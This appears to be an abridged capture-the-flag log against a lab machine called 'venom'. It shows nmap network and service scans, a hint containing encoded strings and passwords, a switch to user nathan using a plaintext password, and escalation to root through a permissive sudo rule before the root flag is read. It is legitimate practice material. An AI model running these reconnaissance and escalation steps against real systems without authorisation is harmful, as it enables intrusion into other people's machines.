┌──(ma5k㉿localhost)-[~] └─$ nmap -sn 192.168.244.0/24 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:31 CST Nmap scan report for localhost (192.168.244.85) Host is up (0.00038s latency). MAC Address: 00:0C:29:49:F0:E7 (VMware) Nmap scan report for localhost (192.168.244.105) Host is up (0.0042s latency). MAC Address: D2:E8:87:FB:35:B2 (Unknown) Nmap scan report for localhost (192.168.244.152) Host is up (0.00018s latency). MAC Address: AC:19:8E:9B:57:53 (Intel Corporate) Nmap scan report for localhost (192.168.244.3) Host is up. Nmap done: 256 IP addresses (4 hosts up) scanned in 2.59 seconds
┌──(ma5k㉿localhost)-[~] └─$ nmap -p- -sV -sT -O 192.168.244.85 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-11-23 18:35 CST Nmap scan report for localhost (192.168.244.85) Host is up (0.00051s latency). Not shown: 65530 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 443/tcp open http Apache httpd 2.4.29 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) MAC Address: 00:0C:29:49:F0:E7 (VMware) Device type: general purpose Running: Linux 4.X|5.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 OS details: Linux 4.15 - 5.8 Network Distance: 1 hop Service Info: Hosts: VENOM, 127.0.1.1; OS: Unix
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.59 seconds
* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= * some knowledge of cipher is required to decode the dora password.. * try on venom.box password -- L7f9l8@J#p%Ue+Q1234 -> deocode this you will get the administrator password
su nathan FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a sudo -l
Matching Defaults entries for nathan on venom: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User nathan may run the following commands on venom: (root) ALL, !/bin/su (root) ALL, !/bin/su
sudo /bin/bash
root@venom:/var/www/html/subrion/uploads# cd /root root@venom:/root# ls -hail total 64K 1177346 drwx------ 7 root root 4.0K May 21 2021 . 2 drwxr-xr-x 24 root root 4.0K May 20 2021 .. 1184378 -rw------- 1 root root 20K May 22 2021 .bash_history 1177363 -rw-r--r-- 1 root root 3.1K Apr 9 2018 .bashrc 1177362 drwx------ 2 root root 4.0K Aug 7 2020 .cache 1190844 drwx------ 4 root root 4.0K May 21 2021 .config 1184238 drwx------ 3 root root 4.0K May 20 2021 .gnupg 1190291 drwxr-xr-x 3 root root 4.0K May 20 2021 .local 1190661 -rw------- 1 root root 201 May 20 2021 .mysql_history 1177364 -rw-r--r-- 1 root root 148 Aug 17 2015 .profile 1191636 -rw-r--r-- 1 root root 29 May 21 2021 root.txt 1191655 drwxr-xr-x 6 root root 4.0K May 21 2021 snap root@venom:/root# cat root.txt #root_flag H@v3_a_n1c3_l1fe.